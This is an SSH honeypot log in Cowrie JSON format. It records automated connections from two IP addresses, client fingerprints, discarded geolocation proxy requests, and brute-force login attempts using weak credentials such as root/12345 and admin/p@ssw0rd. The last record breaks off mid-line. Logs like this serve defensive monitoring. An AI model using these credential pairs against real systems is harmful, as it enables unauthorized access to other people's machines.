{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-31T04:45:10.587341Z","src_ip":"212.227.235.229","session":"59b925ae8680"}
{"eventid":"cowrie.login.success","username":"root","password":"12345","message":"login attempt [root/12345] succeeded","sensor":"my-vps","timestamp":"2025-08-31T04:45:12.522779Z","src_ip":"212.227.235.229","session":"59b925ae8680"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"ip-who.com","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to ip-who.com:80 from :0","sensor":"my-vps","timestamp":"2025-08-31T04:45:13.088496Z","session":"59b925ae8680"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"ip-who.com","dst_port":80,"data":"b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to ip-who.com:80 with data b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T04:45:13.355993Z","src_ip":"212.227.235.229","session":"59b925ae8680"}
{"eventid":"cowrie.session.closed","duration":"3.9","message":"Connection lost after 3.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:45:14.219035Z","src_ip":"212.227.235.229","session":"59b925ae8680"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44710,"dst_ip":"1.2.3.4","dst_port":22,"session":"dbb3c186a758","protocol":"ssh","message":"New connection: 212.227.235.229:44710 (1.2.3.4:22) [session: dbb3c186a758]","sensor":"my-vps","timestamp":"2025-08-31T04:45:16.245251Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-31T04:45:16.258064Z","src_ip":"212.227.235.229","session":"dbb3c186a758"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52518,"dst_ip":"1.2.3.4","dst_port":22,"session":"56e005ed1a18","protocol":"ssh","message":"New connection: 212.227.125.160:52518 (1.2.3.4:22) [session: 56e005ed1a18]","sensor":"my-vps","timestamp":"2025-08-31T04:45:16.281176Z"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-31T04:45:16.500330Z","src_ip":"212.227.235.229","session":"dbb3c186a758"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:45:18.239309Z","src_ip":"212.227.125.160","session":"56e005ed1a18"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:45:18.244110Z","src_ip":"212.227.125.160","session":"56e005ed1a18"}
{"eventid":"cowrie.login.success","username":"root","password":"admin123","message":"login attempt [root/admin123] succeeded","sensor":"my-vps","timestamp":"2025-08-31T04:45:21.620263Z","src_ip":"212.227.235.229","session":"dbb3c186a758"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"ip-who.com","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to ip-who.com:80 from :0","sensor":"my-vps","timestamp":"2025-08-31T04:45:21.985324Z","session":"dbb3c186a758"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56114,"dst_ip":"1.2.3.4","dst_port":22,"session":"06537f12b9d0","protocol":"ssh","message":"New connection: 212.227.125.160:56114 (1.2.3.4:22) [session: 06537f12b9d0]","sensor":"my-vps","timestamp":"2025-08-31T04:45:22.086570Z"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"ip-who.com","dst_port":80,"data":"b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to ip-who.com:80 with data b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T04:45:22.263509Z","src_ip":"212.227.235.229","session":"dbb3c186a758"}
{"eventid":"cowrie.session.closed","duration":"6.3","message":"Connection lost after 6.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:45:22.536767Z","src_ip":"212.227.235.229","session":"dbb3c186a758"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:45:22.563720Z","src_ip":"212.227.125.160","session":"06537f12b9d0"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T04:45:22.564441Z","src_ip":"212.227.125.160","session":"06537f12b9d0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55564,"dst_ip":"1.2.3.4","dst_port":22,"session":"38c165470ddd","protocol":"ssh","message":"New connection: 212.227.235.229:55564 (1.2.3.4:22) [session: 38c165470ddd]","sensor":"my-vps","timestamp":"2025-08-31T04:45:22.584230Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-31T04:45:22.674130Z","src_ip":"212.227.235.229","session":"38c165470ddd"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-31T04:45:22.927326Z","src_ip":"212.227.235.229","session":"38c165470ddd"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"password1","message":"login attempt [postgres/password1] failed","sensor":"my-vps","timestamp":"2025-08-31T04:45:24.333663Z","src_ip":"212.227.125.160","session":"06537f12b9d0"}
{"eventid":"cowrie.login.failed","username":"test","password":"123456","message":"login attempt [test/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T04:45:25.732063Z","src_ip":"212.227.125.160","session":"56e005ed1a18"}
{"eventid":"cowrie.session.closed","duration":"3.7","message":"Connection lost after 3.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:45:25.793354Z","src_ip":"212.227.125.160","session":"06537f12b9d0"}
{"eventid":"cowrie.login.failed","username":"admin","password":"p@ssw0rd","message":"login attempt [admin/p@ssw0rd] failed","sensor":"my-vps","timestamp":"2025-08-31T04:45:27.687904Z","src_ip":"212.227.235.229","session":"38c165470ddd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34782,"dst_ip":"1.2.3.4","dst_port":22,"session":"5037dde39c44","protocol":"ssh","message":"New connection: 212.227.125.160:34782 (1.2.3.4:22) [session: 5037dde39c44]","sensor":"my-vps","timestamp":"2025-08-31T04:45:28.132657Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:45:28.133488Z","src_ip":"212.227.125.160","session":"5037dde39c44"}
{"eventid":"cowrie.session.closed","duration":"11.9","message":"Connection lost after 11.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:45:28.153190Z","src_ip":"212.227.125.160","session":"56e005ed1a18"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:45:28.320996Z","src_ip":"212.227.125.160","session":"5037dde39c44"}
{"eventid":"cowrie.login.failed","username":"worker","password":"worker","message":"login attempt [worker/worker] failed","sensor":"my-vps","timestamp":"2025-08-31T04:45:28.884168Z","src_ip":"212.227.125.160","session":"5037dde39c44"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:45:30.074373Z","src_ip":"212.227.125.160","session":"5037dde39c44"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53134,"dst_ip":"1.2.3.4","dst_port":22,"session":"7accdd7cb10f","protocol":"ssh","message":"New connection: 212.227.235.229:53134 (1.2.3.4:22) [session: 7accdd7cb10f]","sensor":"my-vps","timestamp":"2025-08-31T04:45:31.147472Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:45:32.358006Z","src_ip":"212.227.235.229","session":"7accdd7cb10f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:45:32.359144Z","src_ip":"212.227.235.229","session":"7accdd7cb10f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36040,"dst_ip":"1.2.3.4","dst_port":22,"session":"5198d02b0ec8","protocol":"ssh","message":"New connection: 212.227.235.229:36040 (1.2.3.4:22) [session: 5198d02b0ec8]","sensor":"my-vps","timestamp":"2025-08-31T04:45:32.946309Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-31T04:45:33.067011Z","src_ip":"212.227.235.229","session":"5198d02b0ec8"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-pol